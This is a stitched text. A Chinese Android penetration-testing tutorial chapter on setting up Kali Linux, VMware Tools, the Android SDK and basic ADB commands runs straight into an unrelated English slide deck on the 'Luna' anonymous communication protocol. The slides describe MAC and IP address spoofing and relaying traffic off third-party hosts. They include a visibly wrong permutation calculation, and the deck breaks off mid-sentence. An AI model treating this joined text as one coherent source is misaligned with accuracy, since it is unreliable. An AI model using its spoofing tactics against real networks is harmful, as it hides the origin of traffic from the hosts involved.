1.35 已准备好创建虚拟机 (8)该界面显示了所创建虚拟机的详细信息,接下来就可以创建操作系统了。在该界 面单击“完成”按钮,将显示如图 1.36 所示的界面。 Android 渗透测试入门教程(内部资料)——daxueba.net 版权所有 ·22· 图 1.36 创建虚拟机 (9)该界面显示了新创建的虚拟机详细信息。接下来,就可以准备安装 Kali Linux 1.0.9 操作系统了。为了使虚拟机运行的更快及稳定,在安装 Kali Linux 操作系统之前对创建好的 虚拟机进行简单设置。在 VMware Workstation 窗口中单击“编辑虚拟机设置”,将显示如 图 1.37 所示的界面。 图 1.37 虚拟机设置 (10)在该界面可以设置内存、处理器、网络适配器等。将这些硬件配置好后,选择 “CD/DVD(IDE)”选项,将显示如图 1.38 所示的界面。 Android 渗透测试入门教程(内部资料)——daxueba.net 版权所有 ·23· 图 1.38 选择 ISO 映像文件 (11)在该界面的右侧选择“使用 ISO 映像文件”复选框,并单击“浏览”按钮,选 择 Kali Linux1.0.9 的映像文件。然后单击“确定”按钮,将返回到图 1.36 所示的界面。此 时,就可以开始安装 Kali Linux 操作系统。 (12)在图 1.36 中单击“开启此虚拟机”命令,将显示如图 1.39 所示的界面。 图 1.39 操作系统引导界面 (13)该界面是 Kali Linux 操作系统的引导界面。在该界面选择 Graphical install 选项, 即可开始安装该操作系统。后面的安装方法,和 1.3.1 节介绍的安装方法相同。所以,这里 不再赘述。 1.3.3 安装 VMware Tools VMware Tools 是 VMware 虚拟机中自带的一种增强工具。它是 VMware 提供的增强虚 拟显卡和硬盘性能,以及同步虚拟机与主机时钟的驱动程序。只有在 VMware 虚拟机中安 装好 VMware Tools 工具,才能实现主机与虚拟机之间的文件共享,同时可支持自由拖拽的 Android 渗透测试入门教程(内部资料)——daxueba.net 版权所有 ·24· 功能,鼠标也可在虚拟机与主机之间自由移动(不用再按 Ctrl+Alt)。下面将介绍安装 VMware Tools 的方法。 【实例 1-3】在 VMware Workstation 虚拟机中安装 VMware Tools。具体操作步骤如下 所示: (1)在 VMware Workstation 菜单栏中,依次选择“虚拟机”|“安装 VMware Tools...” 命令,如图 1.40 所示。 图 1.40 安装 VMware Tools 注意:VMware Tools 是安装在操作系统中的。所以,用户必须要启动操作系统,才可 以选择“安装 VMware Tools(T)”命令。否则,该选项状态显示为灰色。 (2)挂载 VMware Tools 安装程序到/mnt/cdrom/目录。执行命令如下所示: root@kali:~# mkdir /mnt/cdrom/ #创建挂载点 root@kali:~# mount /dev/cdrom /mnt/cdrom/ #挂载安装程序 mount: block device /dev/sr0 is write-protected, mounting read-only 看到以上的输出信息,表示 VMware Tools 安装程序挂载成功了。 (3)切换到挂载位置,解压安装程序 VMwareTools。执行命令如下所示: root@kali:~# cd /mnt/cdrom/ #切换目录 root@kali:/mnt/cdrom# ls #查看当前目录下的 文件 manifest.txt VMwareTools-9.9.0-2304977.tar.gz vmware-tools-upgrader-64 run_upgrader.sh vmware-tools-upgrader-32 root@kali:/mnt/cdrom# tar zxvf VMwareTools-9.9.0-2304977.tar.gz -C / #解压VMwareTools 安装程序 执 行 以 上 命 令 后 , VMwareTools 程 序 将 被 解 压 到 / 目 录 中 , 并 生 成 一 个 名 为 vmware-tools-distrib 文件夹。 (4)切换到 VMwareTools 的目录,并运行安装程序。执行命令如下所示: root@kali:/mnt/cdrom# cd /vmware-tools-distrib/ #切换目录 root@kali:/vmware-tools-distrib# ./vmware-install.pl #运行安装程序 执行以上命令后,会出现一些问题。这时按下“回车”键,接受默认值即可。 注意:在执行 vmware-install.pl 程序过程中,会检测系统的内核头文件。如果系统中没 有安装内核头文件的话,将显示如下信息: Enter the path to the kernel header filtes for the 3.14-kali1-amd64 kernel? The path " " is not a valid path to the 3.14-kali1-amd64 kernel headers. Would you like to change it? [yes] no 在以上提示信息中,输入 no 即可继续安装 VMware Tools。 (5)重新启动计算机。然后,虚拟机和物理机之间就可以实现复制、粘贴等操作。 Android 渗透测试入门教程(内部资料)——daxueba.net 版权所有 ·25· 1.4 Kali Linux 安装后简单设置 当 Kali Linux 操作系统安装完成后,用户即可直接使用。但是,在使用过程中会需要安 装一些其它软件,或者需要输入中文。当用户安装某软件时,可能发现找不到相应的软件包, 或者无法输入中文。所以,在用户使用 Kali Linux 操作系统之前,进行一些简单设置,如配 置软件源、安装中文输入法、设置 VPN 代理等。这样,用户在执行操作时也会觉得很顺利。 本节将介绍 Kali Linux 安装后的一些简单设置。 1.4.1 配置软件源 在 Kali Linux 操作系统中,默认只有 Kali 官方和一个 security 源。通常情况下,由于网 络原因一些软件从默认的源中无法下载,或者默认源中没有提供需要的软件。这时候,用户 可以通过添加新的软件源来解决该问题。下面介绍如何在 Kali 中配置软件源。 目前,国内较快的一个软件源是“中国科学技术大学”。下面将以该软件源为例,介绍 在 Kali 中配置软件源的方法。Kali Linux 操作系统默认的软件源保存在/etc/apt/sources.list/ 文件中。所以,在该文件中添加软件源的地址。如下所示: root@kali:~# vi /etc/apt/sources.list deb http://mirrors.ustc.edu.cn/kali kali main non-free contrib deb-src http://mirrors.ustc.edu.cn/kali kali main non-free contrib deb http://mirrors.ustc.edu.cn/kali-security kali/updates main contrib non-free 添加完以上源后,保存 sources.list 文件并退出。在该文件中,添加的软件源是根据不同 的软件库分类的。其中,deb 指的是 DEB 包的目录;deb-src 指的是源码目录。如果不自己 看程序或者编译的话,可以不用指定 deb-src。由于 deb-src 和 deb 是成对出现的,可以不指 定 deb-src,但是当需要 deb-src 的时候,deb 是必须指定的。 添加完以上软件源后,需要更新软件包列表后才可以使用。更新软件包列表,执行命令 如下所示: root@kali:~# apt-get update 更新完软件列表后,会自动退出程序。这样,“中国科学技术大学”的软件源就添加成 功了。当系统中没有提供有要安装的包时,会自动的从该软件源下载并安装相应的软件。 注意:在以上过程中,操作系统必须要连接到互联网。否则,更新会失败。 1.4.2 安装中文输入法 在 Kali Linux 操作系统中,默认没有安装中文输入法。在很多情况下,可能需要使用中 文输入法。为了方便用户的使用,下面将介绍在 Kali 中安装小企鹅中文输入法的方法。 1.安装小企鹅输入法 【实例 1-4】安装小企鹅输入法。执行命令如下所示: root@kali:~# apt-get install fcitx-table-wbpy ttf-wqy-microhei ttf-wqy-zenhei 执行以上命令后,安装过程中没有出现任何错误的话,则表示小企鹅输入法安装成功。 2.启动小企鹅输入法 Android 渗透测试入门教程(内部资料)——daxueba.net 版权所有 ·26· 小企鹅输入法安装成功后,需要启动才可以使用。启动小企鹅输入法。执行命令如下所 示: root@kali:~# fcitx 执行以上命令后,会输出大量的信息。这些信息都是启动 fcitx 时加载的一些附加组件 配置文件。小企鹅输入法成功运行后,将会在 Kali Linux 系统桌面的右上角显示一个 图标。 3. 小企鹅输入法之间的切换 小企鹅输入法默认支持汉语、拼音、双拼和五笔拼音四种输入法,这几种输入法默认使 用 Ctrl+Shift 键切换。如果用户想要修改输入法之间的切换键,右击桌面右上角的 图标, 将弹出如图 1.41 所示的菜单栏。 图 1.41 fcitx 菜单栏 图 1.42 Fcitx 配置 在该菜单栏中选择“配置”命令,将显示如图 1.42 所示的界面。在该界面单击“全局 配置”标签,修改输入法之间的切换键,如图 1.43 所示。 图 1.43 全局配置 从该界面可以看到各种快捷键的设置,根据自己习惯用的快捷键进行设置。设置完后, 单击“应用”按钮。 2.设置 XMODIFIERS 环境变量 默认启动小企鹅输入法后,可能在最后出现一行警告信息“请设置环境变量 XMODIFIERS”。这是因为 XMODIFIERS 环境变量设置不正确所导致的。这时候只需要重 新设置一下 XMODIFIERS 环境变量就可以了。该信息只是一个警告,不会影响对输入法的 使用。所以,用户也可以不进行设置。 Android 渗透测试入门教程(内部资料)——daxueba.net 版权所有 ·27· 为了方便用户的的使用,这里将介绍设置 XMODIFIERS 环境变量的方法。其语法格式 如下所示: export XMODIFIERS="@im=YOUR_XIM_NAME" 语法中的 YOUR_XIM_NAME 为 XIM 程序在系统注册的名字。应用程序启动时会根据 该变量查找相应的 XIM 服务器。因此,即便系统中同时运行了若干个 XIM 程序,一个应用 程序在某个时刻也只能使用一个 XIM 输入法。 fcitx 缺省注册的 XIM 名为 fcitx。但如果 fcitx 启动时 XMODIFIERS 已经设置好,fcitx 会自动以系统的设置来注册合适的名字。如果没有设置好,使用以下方法设置。一般在 ~/.bashrc 文件中添加以下内容即可。如下所示: export XMODIFIERS="@im=fcitx" export XIM=fcitx export XIM_PROGRAM=fcitx 添加并保存以上内容后,重新登录当前用户,fcitx 输入法将自动运行。如果没有启动, 则在终端执行如下命令: root@kali:~# fcitx 1.4.3 设置 VPN 代理 Kali Linux 操作系统默认安装后,无法配置 VPN 代理(所有按钮都是灰色),如图 1.44 所示。通常情况下,用户使用国内的网络无法访问国外网站。这时候,用户就可以通过设置 VPN 代理来解决该问题。下面将介绍在 Kali Linux 中设置 VPN 代理的方法。 图 1.44 配置网络连接 从该界面可以看到,配置 VPN 代理的所有按钮都是灰色的,无法点击。这是因为没有 安装 VPN 配置的相关软件包。 1.安装 VPN 配置的软件包 安装 VPN 配置的几个软件包,执行命令如下所示: root@Kali:~# apt-get install network-manager-openvpn-gnome root@Kali:~# apt-get install network-manager-pptp root@Kali:~# apt-get install network-manager-pptp-gnome 执行以上命令后,如果输出信息中没有报错的话,则表示该包安装成功。接下来重新启 动网络管理器,使网络配置生效。执行命令如下所示: root@Kali:~# /etc/init.d/network-manager restart [ ok ] Stopping network connection manager: NetworkManager. [ ok ] Starting network connection manager: NetworkManager. Android 渗透测试入门教程(内部资料)——daxueba.net 版权所有 ·28· 从以上输出信息中,可以看到网络管理器已成功启动。接下来,用户就可以配置 VPN 代理了。 2.配置 VPN 代理 【实例 1-5】将以上软件包安装后,就可以配置 VPN 了。具体操作步骤如下所示: (1)在 Kali Linux 图形界面依次选择“应用程序”|“系统工具”|“首选项”|“网络连 接”命令,将显示如图 1.45 所示的界面。 图 1.45 配置 VPN (2)从该界面可以看到,现在配置 VPN 的按钮可以点击了。在该界面单击“添加”按钮, 将显示如图 1.46 所示的界面。 图 1.46 选择 VPN 连接类型 (3)在该界面选择“点到点隧道协议(PPTP)”选项。然后,单击“新建”按钮,将 显示如图 1.47 所示的界面。 (4)在该界面设置 VPN 连接的名称(任意名称)、服务器地址(网关文本框中)、登 录用户名和密码。具体配置格式,如图 1.47 所示。 (5)以上信息设置完后,单击“高级”按钮,将显示如图 1.48 所示的界面。 Android 渗透测试入门教程(内部资料)——daxueba.net 版权所有 ·29· 图 1.47 设置 VPN 连接 图 1.48 设置认证方法 (6)在该界面勾选“使用点到点加密(MPPE)”选项,该 VPN 连接将自动设置身份 验证方法为 MSCHAP 和 MSCHAPv2。然后单击“确定”按钮,将返回图 1.47 所示的界面。 在该界面单击“保存”按钮,保存配置的 VPN 连接后就可以连接了。 1.5 ADB 工具的安装及配置 ADB 全程为 Android Debug Bridge,它是 Android SDK 里的一个工具。使用该工具可以 直接操作,管理 Android 模拟器或者真实的 Android 设备。ADB 是一个客户端/服务端程序。 其中,客户端是用户用来执行操作的计算机,服务端是 Android 设备。本节将介绍在 Kali Linux 中安装及配置 ADB 工具的方法。 1.5.1 安装 ADB 工具 ADB 工具是 Android SDK 管理器中的一个工具。所以,如果要安装 ADB 工具,则需 要先安装 Android SDK 管理器。ADB 工具只需要在客户端安装,不需要在服务端安装。用 户只需要将 Android 设备上的 USB 调试器打开就可以了。 1.下载 Android SDK Android SDK 的下载地址是 http://developer.android.com/sdk/index.html。在浏览器中打开 该地址,将显示如图 1.49 所示的界面。 Android 渗透测试入门教程(内部资料)——daxueba.net 版权所有 ·30· 图 1.49 Android SDK 下载界面 在该界面可以看到,Android 的所有相关产品。本书中只需要 Android SDK,而不需要 一些其它开发工具,如 Eclipse。所以,这里选择 SDK Tools Only 下载项,下载与自己平台 匹配的包。本例安装该工具的操作平台是 Kali Linux,所以选择 Linux 对应的包 android-sdk_r24.0.2-linux.tgz。 注意:Android 属于 Google 的产品,所以在国内网络上是无法访问该页面的。因此,用 户可能在打开该界面时,显示无法访问或其它问题。这时候,用户就可以使用 VPN 代理来 解决。 2.安装 Android SDK Android SDK 下载后包名为 android-sdk_r24.0.2-linux.tar。具体安装方法如下所示: (1)解压 Android SDK 包。执行命令如下所示: root@Kali:~# tar xvf android-sdk_r24.0.2-linux.tar 执行以上命令后,Android SDK 包将被解压到当前目录中,解压出来的所有文件保存在 android-sdk-linux 目录中。 (2)进入到解压出来的 tools 目录中,运行可执行文件 android 打开 Android SDK 管理 器。执行命令如下所示: root@Kali:~# cd android-sdk-linux/tools/ root@Kali:~/android-sdk-linux/tools# ./android 执行以上命令后,将显示如图 1.50 所示的界面。 Android 渗透测试入门教程(内部资料)——daxueba.net 版权所有 ·31· 图 1.50 Android SDK 管理器 (3)以上就是 Android SDK 管理器界面,在该界面可以更新、下载、安装及卸载 Android SDK 管理的工具。Android SDK manager 启动以后,将自动检测电脑上已经安装的 Android SDK,在该界面底部可以看到检测进度条。该检测过程耗时较长,希望用户耐心的等待。检 测完后,显示界面如图 1.51 所示。 图 1.51 Android SDK Manager 注意:如果以上检测过程较慢的话,很多用户将无法忍受,并且会影响用户的其它操作。 所以,这里介绍一种方法来加快它的检测速度。在 Android SDK Manager 的菜单栏中依次选 Android 渗透测试入门教程(内部资料)——daxueba.net 版权所有 ·32· 择 Tools|Options...命令,如图 1.52 所示。单击 Options...命令后,将显示如图 1.53 所示的界 面。 图 1.52 菜单栏 图 1.53 设置代理 在该界面设置一个代理服务器,具体配置如下所示:  HTTP Proxy Server:输入代理服务器的地址 mirrors.neusoft.edu.cn;  HTTP Proxy Port:设置代理端口号为 80;  勾选 Force https://...sources to be fetched using http://...前面的复选框; (4)ADB 工具包括在 Tools 文件夹下的特定组件中,所以这里要选择安装这些特定组 件,如图 1.54 所示。 图 1.54 Tools 文件夹中的组件 Android 渗透测试入门教程(内部资料)——daxueba.net 版权所有 ·33· (5)从该界面的 Status 列,可以看到安装和未安装的组件。这里选择安装 Android SDK Platform-tools 和 Android SDK Build-tools 组件。用户也可以根据自己的需要安装其它组件。 如果用户想要使用模拟器的话,则可能需要安装一些支持模拟器硬件的其它特定组件,如图 1.55 所示。 图 1.55 Android 4.2.2(API 17)特定组件 提示:关于 Android 模拟器的安装在后面进行介绍。 (6)选择要安装的组件后,单击 Install 12 packages 按钮,将开始安装选择的组件,如 图 1.56 所示。 图 1.56 Choose Package to install 界面 (7)在该界面显示了将要安装的包,确认没有问题后,选择右下角的 Accept License Android 渗透测试入门教程(内部资料)——daxueba.net 版权所有 ·34· 单选按钮。然后,单击 Install 按钮开始按钮,如图 1.57 所示。 图 1.57 开始安装 Packages (8)从该界面底部的进度条中,可以看到正在下载并安装选择的 Packages。在进度条 中,可以看到下载的速度,及安装所需要的时间。在安装过程中可以单击进度条右侧的 按 钮,查看安装过程的日志信息,如图 1.58 所示。 图 1.58 日志信息 (9)以上组件安装完以后,将返回到 Android SDK Manager 界面。仅选择 Installed 属 性,即只查看已安装的组件,如图 1.59 所示。 Android 渗透测试入门教程(内部资料)——daxueba.net 版权所有 ·35· 图 1.59 显示了已安装的组件 (10)从该界面可以看到已安装的组件,从显示的组件中可以确定 Android SDK Plagform-gools 组件已安装。此时,也说明 ADB 工具安装完成。关闭 Android SDK Manager 界面,切换到解压出的 android-sdk-linux 目录中,将看到生成了几个文件,如下所示: root@Kali:~/android-sdk-linux/tools# cd .. root@Kali:~/android-sdk-linux# ls add-ons build-tools extras platforms platform-tools samples SDK Readme.txt sources temp tools 从以上输出信息中,可以看到比之前多了几个文件。其中,ADB 工具在 platform-tools 目录中。切换到该目录中,即可看到有一个名为 adb 的可执行文件,如下所示: root@Kali:~/android-sdk-linux/platform-tools# ls adb api dmtracedump etc1tool fastboot hprof-conv NOTICE.txt source.properties sqlite3 systrace 从以上输出的信息中,可以看到有一个可执行文件 adb,这说明 ADB 工具安装成功。 但是,如果要使用该工具的话,还需要修改用户的环境变量才可以。否则,无法找到该工具 所在的路径。 1.5.2 修改用户的环境变量 为了在 Linux 系统的命令行终端,方便用户使用 Android SDK 提供的各种工具,用户就 需要将 Android SDK 中工具的路径添加到的环境变量中。下面将介绍在 Kali Linux 操作系统 中,设置环境变量的方法。 在 Linux 系统中,用户环境变量的设置习惯上在“/etc/profile”文件和用户宿主目录中 的“~/.profile”文件中进行。其中,“/etc/profile”是全局配置文件,即对所有用户起作用; “~/.profile”为用户配置文件(允许覆盖全局配置)。所以,这里修改“~/.profile”文件。 用户也可以在“~/.bashrc”文件中设置,因为“~/.profile”每次运行时都会调用该文件。在 该文件中添加内容格式如下所示: Android 渗透测试入门教程(内部资料)——daxueba.net 版权所有 ·36· export PATH=${PATH}:<SDK>/platform-tools export PATH=${PATH}:<SDK>/tools 以上语法格式中<SDK>表示 Android SDK 文件夹的路径。因为 Android SDK 提供的工 具保存在<SDK>/platform-tools 和<SDK>/tools 中,所以这里添加两个环境变量。本例中的 Android SDK 文件夹保存在/root/android-sdk-linux 中,所以添加内容如下所示: root@Kali:~# vi ~/.bashrc export PATH=${PATH}:/root/android-sdk-linux/platform-tools export PATH=${PATH}:/root/android-sdk-linux/tools 添加以上内容后,保存并退出文件编辑界面。接下来还需要使该文件的设置生效,执行 如下命令: root@Kali:~# source ~/.bashrc 执行以上命令后,将不会输出任何信息,则表示环境变量设置正确。为了确定该环境变 量是否成功,下面可以通过启动 ADB 工具来验证环境变量设置。 提示:如果用户没有设置环境变量的话,也可以运行 ADB 工具。但是,每次运行时必 须要输入 ADB 工具所在位置的绝对路径(# ./android-sdk-linux/platform-tools/adb),这样操 作起来比较麻烦。设置环境变量后,在命令行终端直接输入 adb 命令即可运行该工具。 【实例 1-6】启动 ADB 工具,验证环境变量的设置。执行命令如下所示: root@kali:~ # adb Android Debug Bridge version 1.0.32 -a - directs adb to listen on all interfaces for a connection -d - directs command to the only connected USB device returns an error if more than one USB device is present. -e - directs command to the only running emulator. returns an error if more than one emulator is running. -s <specific device> - directs command to the device or emulator with the given serial number or qualifier. Overrides ANDROID_SERIAL environment variable. -p <product name or path> - simple product name like 'sooner', or a relative/absolute path to a product out directory like 'out/target/product/sooner'. If -p is not specified, the ANDROID_PRODUCT_OUT environment variable is used, which must be an absolute path. -H - Name of adb server host (default: localhost) -P - Port of adb server (default: 5037) devices [-l] - list all connected devices ('-l' will also list device qualifiers) connect <host>[:<port>] - connect to a device via TCP/IP Port 5555 is used by default if no port number is specified. disconnect [<host>[:<port>]] - disconnect from a TCP/IP device. Port 5555 is used by default if no port number is specified. Using this command with no additional arguments will disconnect from all connected TCP/IP devices. 从输出的信息中,可以看到成功启动了 ADB 工具,并显示了该工具的使用方法及各参 数的详细描述。这说明环境变量设置成功。如果环境变量设置失败的话,将会显示找不到该 命令。 注意:如果用户在 64 位操作系统中运行该工具的话,将会提示“adb: error while loading shared libraries: libstdc++.so.6: cannot open shared object file: No such file or directory”错误信 Android 渗透测试入门教程(内部资料)——daxueba.net 版权所有 ·37· 息。因为该工具是一个 32 位程序,所以需要 32 位操作系统的库文件。此时,用户安装 32 位库文件即可解决该文件。执行命令如下所示: root@Kali:~ # apt-get install lib32stdc++6 lib32z1 lib32z1-dev 1.6 ADB 工具的使用 ADB(Android Debug Bridge)是 Android SDK 提供的一个通用的调试工具。使用该工 具可以管理 Android 设备或者 Android 模拟器的状态,还可以进行很多的操作,如安装软件、 系统升级、运行 Shell 命令等。本节将对 ADB 工具做一个整体介绍。对该工具很熟悉以后, 用户就可以更好的在电脑上管理 Android 设备或 Android 模拟器了。 1.6.1 启动和停止 ADB 服务 使用 ADB 工具时,并不需要手动启动和关闭 ADB 服务。但是,通常模拟器运行一段 时间后,ADB 服务可能会出现异常。导致所有命令都不能准确输出,这时候用户最好先关 闭 ADB 服务,然后再重新启动。 1.关闭 ADB 服务 关闭 ADB 服务,执行命令如下所示: root@Kali:~/android-sdk-linux/tools# adb kill-server 执行以上命令后,没有任何输出信息,则表示 ADB 服务已成功关闭。 2.启动 ADB 服务 启动 ADB 服务,执行命令如下所示: root@Kali:~# adb start-server * daemon not running. starting it now on port 5037 * * daemon started successfully * 从输出的信息,可以看到 ADB 服务已成功启动,并且默认监听端口 5037。 1.6.2 查看 Android 设备 Android 系统的平板或手机都是真实的 Android 设备,而 Android 模拟器模拟出来的 Android 设备,也被电脑识别为一台实际存在的设备。下面将介绍查看电脑中的真实 Android 设备和 Android 模拟器设备,是否与电脑处于正常的链接状态。执行命令如下所示: adb devices 例如,当前主机运行了一个 Android 模拟器,然后还连接了一个真实的平板。执行以上 命令后,将显示如下所示的信息: root@kali:~# adb devices List of devices attached emulator-5554 device 0123456789ABCDEF device 从以上输出信息中,可以看到显示了两个设备。其中第一个设备是模拟器中的 Android 设备,另一个是平板设备。 Android 渗透测试入门教程(内部资料)——daxueba.net 版权所有 ·38· 1.6.3 安装应用程序 在安卓系统上安装的应用程序包,后缀名都是.apk。下面将介绍在安卓设备中安装应用 程序的方法,其语法格式如下所示: adb install apk 包 或 adb install –r apk 包 第二种方式会覆盖原来安装的软件,但是会保留数据。例如,为 Android 虚拟设备安装 一款游戏,其游戏名为“神庙逃亡”。该游戏程序包可以从安卓应用商店下载,其文件名为 smtwywb_1417500707868.apk。为了用户方便记忆该程序包,可以重命名。这里重命名为 temple-run.apk,并放在 Home 目录中。安装此游戏,执行命令如下所示: root@Kali:~ # adb install temple-run.apk 1197 KB/s (26841898 bytes in 21.888s) pkg: /data/local/tmp/temple-run.apk Success 从以上输出的信息中,可以看到安装包的大小是 26841898 bytes,耗时 21.888s,将该安 装包拷贝到 Android 设备/data/local/tmp 目录中,最后提示安装成功。安装成功后,效果如 图 1.60 所示。 图 1.60 成功安装到 Android 设备上的应用 注意:在使用 adb install 命令安装应用程序时,安装成功后可能会出现 rm failed for -f, No such file or directory 信息。这是因为在 Android 设备设置安装完程序后,自动删除其安装包。 在 Android 设备的命令行中,将会调用 rm 命令删除其软件包。但是在该 Android 设备中 rm 命令的-f 选项不可用,所以提示该信息,即无法删除安装包。 在某些情况下,用户的主机可能连接了多个 Android 设备。但是,用户只想对其中一个 设备进行操作,这时候可以使用-s 选项来指定操作的设备,其语法格式如下: adb -s 设备名 命令 例如,仅向 Android 模拟器“emulator-5554”安装“神庙逃亡”游戏程序,执行命令如 下所示: root@Kali:~ # adb -s emulator-5554 install temple-run.apk 执行以上命令后,输入的结果和前面安装程序的数据信息类似。如果当前主机只连接一 Android 渗透测试入门教程(内部资料)——daxueba.net 版权所有 ·39· 台 Android 设备的话,就不需要指定了,直接输入运行的命令即可。后面将以一台设备情况 为例,介绍 ADB 工具的使用。 注意:有时候,可能因为程序的版本地、或者磁盘空间不足等问题,导致程序安装失败。 下面列出通常情况安装失败的一些错误提示,如图 1.61 所示。 图 1.61 安装应用失败的各种错误提示 以上就是安装应用程序失败常见的类型及出现这些问题的解释。 1.6.4 卸载应用 使用 ADB 命令,同样可以卸载 Android 设备上的应用程序。其语法格式如下所示: adb uninstall 软件包名 或 adb uninstall –k 软件包名 注意:以上语法中所说的是“软件包名”,而非“应用名”,或者“软件名”。“软件 包名”可以看作是软件唯一的标识符。默认情况下,“软件包名”类似于一个反转的网址。 在 Android 设备中,程序包名以文件夹的形式保存在/data/data 目录中。如下所示: root@android:/ # cd /data/data/ root@android:/data/data # ls cn.etouch.ecalendar com.UCMobile.intl com.adobe.flashplayer com.adobe.reader com.android.apkinstaller com.android.backupconfirm com.android.browser com.android.calculator2 com.android.certinstaller com.android.chrome com.android.contacts com.android.defcontainer com.android.deskclock com.android.email Android 渗透测试入门教程(内部资料)——daxueba.net 版权所有 ·40· com.android.exchange 以上就是当前系统中的一些程序包名。注意,这里必须是 root 用户才可以查看(Android 设备必须获取到 root 权限),普通用户没有权限。 例如,卸载 1.6.3 小节中安装的“神庙逃亡”程序。其中,该程序的包名为 com.imangi.templerun。所以,执行命令如下所示: root@Kali:~ # adb uninstall com.imangi.templerun Success 从输出的信息中,可以看到提示信息为 Success,表示“神庙逃亡”程序卸载成功。此 时,到 Android 设备上查看,可以发现找不到该程序,如图 1.62 所示。 图 1.62 应用程序已被卸载 提示:用户也可以将程序包,即.apk 文件进行反编译。然后,在反编译后的源文件中查 看程序包名。关于反编译程序包的方法,将在下一章介绍。 1.6.5 进入设备或者模拟器的 Shell 进入 Android 设备的 Shell 命令如下所示: root@Kali:~# adb shell 执行以上命令后,命令行提示符将被修改。如下所示: root@android:/ # 可以看到提示符已经变化,这表示已进入到 Android 设备。根据命令行显示的提示符“#”, 可知当前登录的用户是 root。如果是普通用户登录的话,命令行提示符为“$”。此时,用 户可以在该终端,执行各种 Linux 命令。例如,查看当前目录中的内容,显示结果如下所示: root@android:/ # ls acct bcm4329_cybertan.hcd bcm4329_samsung.hcd bcm4329_usi.hcd cache charger config d data Android 渗透测试入门教程(内部资料)——daxueba.net 版权所有 ·41· default.prop dev etc init init.goldfish.rc init.rc init.rk30board.rc init.rk30board.usb.rc init.trace.rc 以上输出的信息,显示了当前目录中所有的文件和文件夹。在 Linux 中,一些命令必须 是 root 权限才可执行。如果用户登录的 Android 设备是普通用户的话,可以使用 su 命令切 换到 root 用户。 提示:用户也可以在 Kali Linux 命令行终端直接执行以上命令,其语法格式如下所示: adb shell 命令 例如,直接执行 ls 命令,运行效果如下所示: root@Kali:~ # adb shell ls acct bcm4329_cybertan.hcd bcm4329_samsung.hcd bcm4329_usi.hcd cache charger config d data default.prop dev etc init init.goldfish.rc init.rc init.rk30board.rc init.rk30board.usb.rc init.trace.rc 1.6.6 上传文件到设备 将当前主机上的文件上传到 Android 设备,可以使用 adb push 命令来实现。其语法格式 如下所示: adb push 本地路径 设备路径 例如,将 temple-run.apk 文件上传到 Android 设备。执行命令如下所示: root@Kali:~# adb push temple-run.apk /data/local/tmp 787 KB/s (26841898 bytes in 33.297s) 以上输出信息显示了包的大小,上传速度及时间。此时,用户可以使用 ls 命令查看 temple-run.apk 包是否上传成功。如下所示: root@Kali:~# adb shell ls /data/local/tmp AdobeReader_appchn.apk Vulnerable.apk WebQQ.apk Android 渗透测试入门教程(内部资料)——daxueba.net 版权所有 ·42· sqlite.apk tcpdump temple-run.apk vulnsqlite.apk 从输出的信息中可以看到在/data/local/tmp 文件中,已经有 temple-run.apk 文件(加粗的 文件),这表明该文件上传成功。 1.6.7 从设备上下载文件 从 Android 设备上下载文件到计算机,可以使用 adb pull 命令来实现。其语法格式如下 所示: adb pull 设备路径 本地路径 例如,从 Android 设备上下载 temple-run.apk 文件到当前主机的/data 目录中。执行命令 如下所示: root@Kali:~# adb pull /data/local/tmp/temple-run.apk /data 791 KB/s (26841898 bytes in 33.112s) 以上输出信息显示了下载文件的速度,及时间等。此时,用户可以切换到当前主机的 /data/目录中,查看下载的文件,如下所示: root@Kali:/data# ls temple-run.apk 从输出信息中,可以看到 temple-run.apk 文件已成功下载。
aRgus d4yj4y sMURFBOy the Luna Correspondence Protocol The security of our world as we know it is at stake. The nature of our project may lend itself to abuse by malicious users, cooperate espionage, and even terrorism. More positive applications include freedom of speech and information under oppressive regimes, and personal privacy on a largely public network. Why Are We Here? • Secure, un-traceable, anonymous communication. • This is the Luna protocol. • This is our goal. Abstract • Luna is a revolutionary new protocol used to anonymously transmit and receive data securely across the Internet. • Luna is based on finite improbabilities of vast random data dispersal and exploits properties of IP to accomplish a portion of it's goals. Loki? Achieving Anonymity the Luna way Relaying Trickery • Luna makes use of well known and existing flaws in network protocols and conventional firewall implementations. • Luna uses tactics for which logging and filtering would be costly and impractical on high traffic relay hosts. • When properly implemented, Luna harms no host along it’s path, or impairs it’s bandwidth. Host-Level Transmission Relay 1 Relay 3 Relay 2 Transmitters Network Receivers Network Internet Host-Level Transmission Relay 3 Transmitters Network Receivers Network Internet Relay 1 Relay 2 Internet Host-Level Transmission Relay 1 Relay 2 Receivers Network Transmitters Network Relay 3 Internet Host-Level Transmission Receivers Network Transmitters Network Relay 3 Internet Host-Level Transmission Relay 1 Relay 2 Receivers Network Transmitters Network Internet Receivers Network Host-Level Transmission Relay 1 Relay 2 Relay 3 Transmitters Network Internet Receivers Network Host-Level Transmission Relay 1 Relay 2 Relay 3 Transmitters Network Several means of host deception are employed to facilitate anonymous transfer: • MAC Address Spoofing (ISO Layer 2)- Luna assumes multiple Media Access Control Addresses. • IP Address Spoofing (ISO Layer 3)- Luna bounces transmissions off a high traffic 3rd party host using a source address from the target destination. Spoofing Achieving Inefficiency the Luna way Inefficiency Briefing • Data must not be sent in a predictable fashion in predictable time • Avoid all patterns • Data must be reordered • Avoid all patterns • Data must be randomized • Avoid all patterns • Data must contain false positives • Avoid all patterns And Then There is Crypto ... Cryptography is insufficient for primary means of communication, however it is far from trivial. Achieving Security the Luna way Mathematical Permutation Function P(n,r) = n! / (n-r)! N = total number of packets R = set of packets composing real data (eliminating bogus packets) Mathematical Permutation Function P(60,10) = 60! / (60-10)! P = 2.735898472+E17 P(100,80) = 100! / (100-10)! P = Overflow Arrg. My trusty ti-83 can’t comprehend the possibilities of even 100 packets. Mathematical Permutation Function 1 2 3 4 0 6.3 12.5 18.8 25.0 Packets (all real; no bogus) Packet-Level Transmission Data Filters • Filters are applied over the entire datum, before it’s chunked into packets • Filter plug-ins can be anything from encryption ciphers such as RSA, PGP, and Blowfish to Base64 and ASCII translation encoding • Filters are not applied to the start and stop sequences Even if the Luna protocol is cracked or flawed and an encryption data filter is used (Base64 encoding isn’t an encryption data filter, it’s an encoding data filter), data is still secured by the encryption filters strength. Thus, Luna is at least as strong as the weakest encryption filter used. Multi-Tiered Security Summary • Achieving inefficiency via The Luna Protocol • Packet bleeding • Achieving anonymity via The Luna Protocol • Spoofing • Relaying • Host-level transmission (OSI Layers 2 and 3) • Achieving security via The Luna Protocol • Mathematical Formula • Packet-level transmission (OSI Layer 5) • Data filters Chung’s Final Thoughts “There is no tool that makes up for a lack of knowledge or poor 